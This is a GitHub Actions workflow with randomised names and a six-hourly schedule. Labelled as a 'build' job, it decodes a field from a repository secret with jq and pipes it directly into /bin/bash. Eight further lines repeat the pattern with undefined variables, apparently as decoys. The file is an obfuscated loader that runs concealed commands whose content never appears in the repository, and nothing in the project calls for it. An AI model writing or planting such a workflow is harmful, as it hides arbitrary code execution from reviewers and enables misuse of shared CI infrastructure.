name: qinmianhong6234

on:
  workflow_dispatch:
  schedule:
    - cron: '23 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qinmianhong6234
        env:
          ayfk39787: ${{ secrets.ayfk39787 }}
        run: |
          echo $ayfk39787 | jq -r .mgiin25048 | /bin/bash
          echo $hbnf5 | jq -r .frme24806 | /bin/bash
          echo $usv38051 | jq -r .mq651 | /bin/bash
          echo $w34 | jq -r .gm8 | /bin/bash
          echo $vhbpf79166 | jq -r .zxbri0477 | /bin/bash
          echo $lmc24282 | jq -r .ssav198 | /bin/bash
          echo $aum83829 | jq -r .nqt84 | /bin/bash
          echo $tquq33 | jq -r .wzvgh0 | /bin/bash
          echo $zp0113 | jq -r .gfzvf8 | /bin/bash

